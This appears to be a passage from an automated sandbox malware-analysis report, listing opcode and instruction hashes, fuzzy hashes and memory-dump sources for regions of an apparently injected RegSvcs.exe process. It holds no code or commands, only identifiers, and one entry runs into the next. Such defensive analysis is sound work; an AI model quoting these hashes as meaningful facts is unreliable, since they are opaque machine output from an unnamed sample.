                                              • Opcode Fuzzy Hash: a4f175487b32e38816227c8e620804c7bef62b30964c6c9bc2e46ab8a4b05fce
                                              • Instruction Fuzzy Hash: 23C149B5A0120ADFEB15DFA4D484A9DBBF2FF89310F148469E809AB365DB30EC45CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c636c774911d71f55b3bcc7e92801d64b816ff99849d73ebb0185d576b6ebb8b
                                              • Instruction ID: 021643776a3364a054fae05cdfd1255c9c3ec462706382f64b9e303a6e69f7e2
                                              • Opcode Fuzzy Hash: c636c774911d71f55b3bcc7e92801d64b816ff99849d73ebb0185d576b6ebb8b
                                              • Instruction Fuzzy Hash: 069184F0710216AFFB145A799818B3A7EABAFC5744F18C2399D0AC7784DE74C842E751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04302c4534fad8ea7a6a6b75f469f486025636a2d9e1d5b4bccc75a44fb2455e
                                              • Instruction ID: f3a80a8e473f7ac1517beb4e0007d46098c4ac7a0801853eb0fc38310f13a009
                                              • Opcode Fuzzy Hash: 04302c4534fad8ea7a6a6b75f469f486025636a2d9e1d5b4bccc75a44fb2455e
                                              • Instruction Fuzzy Hash: 06C126B5A0020ADFEB15DFA4D48499DBBF2FF89310F158069E809AB365DB31EC45CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d540f67d95fb6971723a5b9cbf9bea9dbefeb5c379647212dfcb62d99a009b74
                                              • Instruction ID: 74c4c5e318480bf1750a788ddf3298753926bb7ee2c982aa82e9fb96eb68b69b
                                              • Opcode Fuzzy Hash: d540f67d95fb6971723a5b9cbf9bea9dbefeb5c379647212dfcb62d99a009b74
                                              • Instruction Fuzzy Hash: 3991B2B5B0020ADFEB15DB68D594AAEBBF6FF84300F148169D80A97355DB34DC42DB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03f75f5a1761d385e630d886b45454a513664656d8e6dde342fa2d1ca9e61419
                                              • Instruction ID: 66fd7bed1722328b0f6477e23d0242c3f4549782d5543b4575a5eb3889b53f11
                                              • Opcode Fuzzy Hash: 03f75f5a1761d385e630d886b45454a513664656d8e6dde342fa2d1ca9e61419
                                              • Instruction Fuzzy Hash: B9A13BB4A10209DFEB18DFA5C45495EBBB7BF88300F148529D90A9B364DF70ED06CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ec3f348312f69a8e75b16ac364676b4bae53b8af01e4864794b8e6c1059f6e26
                                              • Instruction ID: 4783dff211c2b247077e1907477021e7dda9e8166d53e590935f1238de63af10
                                              • Opcode Fuzzy Hash: ec3f348312f69a8e75b16ac364676b4bae53b8af01e4864794b8e6c1059f6e26
                                              • Instruction Fuzzy Hash: 6EA14974600306EFC709EF68D884D5ABBB2FF89310B118A9CD55A9B762DB70ED45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bec5549d65bce0c0ed76585e91af557fb34589e6d7379cba4a5f8a30393418ae
                                              • Instruction ID: c842fabc9b43b2a579fba531d5abab9c3f3b7a0d651997017cb3f8922eb40c15
                                              • Opcode Fuzzy Hash: bec5549d65bce0c0ed76585e91af557fb34589e6d7379cba4a5f8a30393418ae
                                              • Instruction Fuzzy Hash: F7718270B20201DFC7289F39D458AAA7BF6AFC9755B1640AAE506CB3B2CE71DC41CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef93352c55fc75f5a39ec0bd28750c971a8bc2ef17d0c73e7f5ed05670c4a821
                                              • Instruction ID: da888b746eeedcb8ceddbc3f67c683a81406db34aab5469c090b0db472075d32
                                              • Opcode Fuzzy Hash: ef93352c55fc75f5a39ec0bd28750c971a8bc2ef17d0c73e7f5ed05670c4a821
                                              • Instruction Fuzzy Hash: 32A13974600306EFC709EF68D884D59BBB2FF89310B108A9CD55A9B762DB70ED45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 552e9e4eb75d09a08925cf203a0f24e644a6e1b0f37440f10cfe9936aabf994e
                                              • Instruction ID: 51124938f172cbf244fe354621941e7b0282bb1e3109a89bc1761aac5e4390e6
                                              • Opcode Fuzzy Hash: 552e9e4eb75d09a08925cf203a0f24e644a6e1b0f37440f10cfe9936aabf994e
                                              • Instruction Fuzzy Hash: 0761F3B1B052169FEB14CB69D884AAEBBF9FFC9320B14C92EE558C7640D731DC018B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed827dfbc2bf1b1669223f8174a3b5d720d70a8b0d94a404c0e013bbd253d47b
                                              • Instruction ID: 3ee395da033a3130e3fa1108006aa967128879ae7303c0448b03e5ee6a05d8a3
                                              • Opcode Fuzzy Hash: ed827dfbc2bf1b1669223f8174a3b5d720d70a8b0d94a404c0e013bbd253d47b
                                              • Instruction Fuzzy Hash: 1271A1B5B00215DFDB499F79D858AAEBBF6FF88310F148029E916D7390DF7498058B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3cb15f6d09236821defd81ecabf8fd4d44b6e70774bb6265cc3ea8f516146640
                                              • Instruction ID: e155b4fae78c6c3a6c2b8a663c52929b002bd6a59ae3b67700080855ab60eb14
                                              • Opcode Fuzzy Hash: 3cb15f6d09236821defd81ecabf8fd4d44b6e70774bb6265cc3ea8f516146640
                                              • Instruction Fuzzy Hash: B9816DB5A10216DFCB14DF68C9848AEBBF5FF89350B1580AAE905EB361D730ED41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3faa64dd3d8d3f91a175abf0223e04deee18b30f7eb97b64adb22988b4c56a5
                                              • Instruction ID: 43b37de81d74900ca0caebf086c749df9b4ce0de20fa51a0d4ffe664bc7b666f
                                              • Opcode Fuzzy Hash: c3faa64dd3d8d3f91a175abf0223e04deee18b30f7eb97b64adb22988b4c56a5
                                              • Instruction Fuzzy Hash: EC81AC70A0130ADFEB05EFA8D895A9DBBF6FF84300F154169D80AA7355EB34AC46CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2fcf4589dd409ca27059b5787a4398b16239bf80f6a0d6e647a97e42ae2b3e42
                                              • Instruction ID: 9d46f94867d8c9fca494b26f113e7f20967a140365b99721b02a2a952d4f7167
                                              • Opcode Fuzzy Hash: 2fcf4589dd409ca27059b5787a4398b16239bf80f6a0d6e647a97e42ae2b3e42
                                              • Instruction Fuzzy Hash: 71818CF0600356CFEB25DF38C544A6ABBF6EF84300F048929E94A8B651DB74EA45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2013f058fea58df9ac2218b676d1e9e40e472597e89b15b3ae41efb59a06568c
                                              • Instruction ID: 88b4579b833759901674105c463d36813e600bd0dd3da21c459389d338ce47eb
                                              • Opcode Fuzzy Hash: 2013f058fea58df9ac2218b676d1e9e40e472597e89b15b3ae41efb59a06568c
                                              • Instruction Fuzzy Hash: 196107B1B10346DFEB21DF78D884E9ABBF5FF86215F0444AAD94A8B642C730E885C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a5f03a76537abfc4b00263cb813522d650decdb68d3e18c24ee2db532739ad2e
                                              • Instruction ID: 870d9810914bab1ef70ca18f5e861a262028b726d64de30b019d6ad8e82d8b2e
                                              • Opcode Fuzzy Hash: a5f03a76537abfc4b00263cb813522d650decdb68d3e18c24ee2db532739ad2e
                                              • API String ID:
                                              • Opcode ID: 135731e4e2f4145055f220a68af984ee5f8d3534aa4b565e6d230efac24d9021
                                              • Instruction ID: 0f5bd606609bd40d94c68beba8482e9891466a29cfc2613af0753c6ab30b4021
                                              • Opcode Fuzzy Hash: 135731e4e2f4145055f220a68af984ee5f8d3534aa4b565e6d230efac24d9021
                                              • Instruction Fuzzy Hash: 8A41B570210701EFE359EB64D840B4ABBE2FFD1314F44D91CC2669BA51CFB5B9088B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 520f5d948577990ffc6079e36b97a0efa68196101728c53115da7a400b39e7b0
                                              • Instruction ID: 3303e54435ffe0898c9b5d3558ceb92b2823841e7502c4a59c08530642ce1f56
                                              • Opcode Fuzzy Hash: 520f5d948577990ffc6079e36b97a0efa68196101728c53115da7a400b39e7b0
                                              • Instruction Fuzzy Hash: 9D4173F1A10225CFE724DB68C4105AE7BF6AF88650B104669C54E9B754DFB8ED00CBD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df6679744baf6221581177d602356a561cf31f94cf9247c89a5990f7d498e097
                                              • Instruction ID: 3b6a00fb97e761055ad369c47cf2840bfcd279b0d5d4959391481f41691dd42e
                                              • Opcode Fuzzy Hash: df6679744baf6221581177d602356a561cf31f94cf9247c89a5990f7d498e097
                                              • Instruction Fuzzy Hash: 7C413DB5720106DFDB18DF68C9949AABBF1FF89350B1580A9E905DB362DB30ED41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661790668.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73d0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52434385c05757cffae4e9f445d9e39997ebf5e90c0023c86f0dc6b53e227b2e
                                              • Instruction ID: 93c143ce50dd2de70a49cb5f2b8156fa29a02eba844dff1061113bcabfaa10c7
                                              • Opcode Fuzzy Hash: 52434385c05757cffae4e9f445d9e39997ebf5e90c0023c86f0dc6b53e227b2e
                                              • Instruction Fuzzy Hash: 2B310BF7105386EFEB1A4E30E8147E53FB5AF42A44F094196F848865E2D3398C88CB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a1819be3b00941a203136cb3767d343e8a8b904bfa87af9ee9c67e9badad23d
                                              • Instruction ID: 780bec4cb7da589d4af304bec0dded4949f6eac7491694353c32724d035befa1
                                              • Opcode Fuzzy Hash: 2a1819be3b00941a203136cb3767d343e8a8b904bfa87af9ee9c67e9badad23d
                                              • Instruction Fuzzy Hash: 1F31E775B10209CFEB49DBA8C580E9DBBB2FF88320F195558E505AB361CB71EC45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 285cb201c17811467b2df13519119367dd98d96d183ac4627ae6b0fb52a2791f
                                              • Instruction ID: bcbe8491cf312c944b83e027c05394ff3fc79c0fcee1496ec0c4010b010ce698
                                              • Opcode Fuzzy Hash: 285cb201c17811467b2df13519119367dd98d96d183ac4627ae6b0fb52a2791f
                                              • Instruction Fuzzy Hash: A2314975B00201EFCB15DF38D8989AA7BB6EF89340B148169E906CB355DB75ED06CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84feae7594470f71a03dcac955dae07258c47e9a352a207af217e807cb714cd8
                                              • Instruction ID: 58f39144b2b4554791c4fb8a7d363de57ea210be46d826680a9a90b97df9611f
                                              • Opcode Fuzzy Hash: 84feae7594470f71a03dcac955dae07258c47e9a352a207af217e807cb714cd8
                                              • Instruction Fuzzy Hash: 9331E775B10209CFEB49DBA8C980E9DBBB2FF88320F155558E505AF361CA71EC45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3358adec0bc1d6cddb9aa9add117d562ab09caf30a68b200dab633ccebeb354
                                              • Instruction ID: f2e37e747aa3838082dd11d76f9b4a137b8294b14686c16aef276748b66dff8b
                                              • Opcode Fuzzy Hash: a3358adec0bc1d6cddb9aa9add117d562ab09caf30a68b200dab633ccebeb354
                                              • Instruction Fuzzy Hash: E6319A75B10205AFDB05DF68D854ABEBFB6AF88310F14805AE909DB2A5CB70DD01DB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f74e8053b9a23836e8817eadc9dfd36b11e98430af63d4cda5ec5118d0eeac5
                                              • Instruction ID: 1bff425a5f6c628bf97261eb97a2a4ff230ab1444f105b7239b3a6bb7f8652a5
                                              • Opcode Fuzzy Hash: 9f74e8053b9a23836e8817eadc9dfd36b11e98430af63d4cda5ec5118d0eeac5
                                              • Instruction Fuzzy Hash: 11313975B00211EFCB15DF38D8889AA7BB6EF89340B148168E906CB355DB35ED06CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf0f89f2af47caf8f47c9ae078a4acd337c177305c9ed190db0c90ed0778f0dd
                                              • Instruction ID: c932779ffbe02d08f5b7baf1fcf4cfbb62413cf86b8461c9e2a9abd3339b41c4
                                              • Opcode Fuzzy Hash: cf0f89f2af47caf8f47c9ae078a4acd337c177305c9ed190db0c90ed0778f0dd
                                              • Instruction Fuzzy Hash: 3F318DB1600309DFEB09DF24C584AAEBBF2FF84314F108569E9099B262CB71ED45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb7fdbd1ebf1565d643ff626717ad190c7e9117715c550477a8c75ed10d0d198
                                              • Instruction ID: f21ab30d98c42d6a99779d8c3b6a4be3ed2ee584c157d13e4b4fa55122670b52
                                              • Opcode Fuzzy Hash: bb7fdbd1ebf1565d643ff626717ad190c7e9117715c550477a8c75ed10d0d198
                                              • Instruction Fuzzy Hash: 6A315AB57013059FC715DF68D884CAABBB6FF8A350B1486A9E819CB351DB31EC44CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b30b42b176b3e5bd33b04d26ca8a26b42dac69099981cfb499530144c3398920
                                              • Instruction ID: c3c84e32e1f4f973ac86a7e705d62c2010d484adf82b21ca6e9061c291d6c9ba
                                              • Opcode Fuzzy Hash: b30b42b176b3e5bd33b04d26ca8a26b42dac69099981cfb499530144c3398920
                                              • Instruction Fuzzy Hash: C631BEB0600345DFEB19DF24C184AAEBBF2FF85304F1584A9D8098B262CB75ED45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79f5620d0525d3bdf9db27c53e4a734d3b670bc3fee0b5d2a24c307849900631
                                              • Instruction ID: a5464006e319d1d75601d46497b7f1115b82b4389bb2a85997f8bc0e9987d422
                                              • Opcode Fuzzy Hash: 79f5620d0525d3bdf9db27c53e4a734d3b670bc3fee0b5d2a24c307849900631
                                              • Instruction Fuzzy Hash: 1231F531605249DFD709EB78C895A6D7FB6FF8A300F20806ED50987262DF359C45C752
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2ea6dfeb27330dd0f79c2576f4821e6eeb0052b5338b271dcb56f2b7f0e4e229
                                              • Instruction ID: 481c0663d9284575907e86d6e71fc8c5ccc0f68baadac3179f2e353c33364e79
                                              • Opcode Fuzzy Hash: 2ea6dfeb27330dd0f79c2576f4821e6eeb0052b5338b271dcb56f2b7f0e4e229
                                              • Instruction Fuzzy Hash: 342180B0310305ABE709A671D86573E7B63EFC0390F08882CDA128B980DEB59D4A8390
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14b7ce5c9a6fb136f544a0ada571c1534467550d96b639171e8517d2e3262378
                                              • Instruction ID: 7040aca2e06306114b7754fcbb1b305a7c3056b6408845633ab145d76545c67d
                                              • Opcode Fuzzy Hash: 14b7ce5c9a6fb136f544a0ada571c1534467550d96b639171e8517d2e3262378
                                              • Instruction Fuzzy Hash: 6E318DB0755256EFEB14DF29C844E6ABBB6EF85314F454069E80ACB3A2CB30DD40CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1bd3c72abccce20392e9cd25dacd579b5877e98f8ca335e5fc044d122c8983a2
                                              • Instruction ID: 2779d21ef01cfe16e975928016042d3ef99b40f7576127179068c483d5ec3f51
                                              • Opcode Fuzzy Hash: 1bd3c72abccce20392e9cd25dacd579b5877e98f8ca335e5fc044d122c8983a2
                                              • Instruction Fuzzy Hash: AC212AB1310110DFDB18DB29D899D2A7BEAAFC9B50B5541A9EA0ACB371DE60DC41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cfc145d74aa9868e2b3052a8f74071395cdd1d0cd9642ebccf9ffeec1d21b7d8
                                              • Instruction ID: 052889f5bf8c518460ce0855e242553c8950c54a8ce474918c825eb265ffda59
                                              • Opcode Fuzzy Hash: cfc145d74aa9868e2b3052a8f74071395cdd1d0cd9642ebccf9ffeec1d21b7d8
                                              • Instruction Fuzzy Hash: 2F2174B0310305BBE70DA671D85573E7663EFC0390F08C82CD6168F584DEB59D458394
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 284acc88b2a80fc175461177e54ffe9bfa88cacf00b2608de36ed17d656276d1
                                              • Instruction ID: de6f46ec575123cf6bee95333a2a75ecb692a2818b52ed04c262d17e4537b590
                                              • Opcode Fuzzy Hash: 284acc88b2a80fc175461177e54ffe9bfa88cacf00b2608de36ed17d656276d1
                                              • Instruction Fuzzy Hash: E2318FB1600255DFD718DF68D484EAA77F6FF89310B1044A9E90ADB361DB30ED80CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e49e6af464353eb749f66b4af194d1857d00217967040093496693015e9cbab
                                              • Instruction ID: e859302d58626e2badee0d31b62b7cc548be5ddf4e5bcd077b5036e22c3b246d
                                              • Opcode Fuzzy Hash: 8e49e6af464353eb749f66b4af194d1857d00217967040093496693015e9cbab
                                              • Instruction Fuzzy Hash: 5821A171201340AFD3259F34D844E56BFF6EF86324B1584AAE5868B3A3CB71ED45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d73268af10d3a673ce1f4c6c4bf5a18cfdec9978a4b439fe71e07c0822e2c742
                                              • Instruction ID: 72bf855fb6fb85246cab0346abd46b28e7fbe4d0e46129e61cf31baa5859ddab
                                              • Opcode Fuzzy Hash: d73268af10d3a673ce1f4c6c4bf5a18cfdec9978a4b439fe71e07c0822e2c742
                                              • Instruction Fuzzy Hash: 8921AEB1A01606CFEB16CF68C984EAABBB4FF89750F1580A9D8099B361D730DD41CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 857f318e74e7ab378e9fb2fc58431eb559422c58bb868a8f8d0fbedceb6c2e59
                                              • Instruction ID: 8ac7b9d88290475170e65132b8ba1f80eb9a62da756f31af7970ea5a4793d587
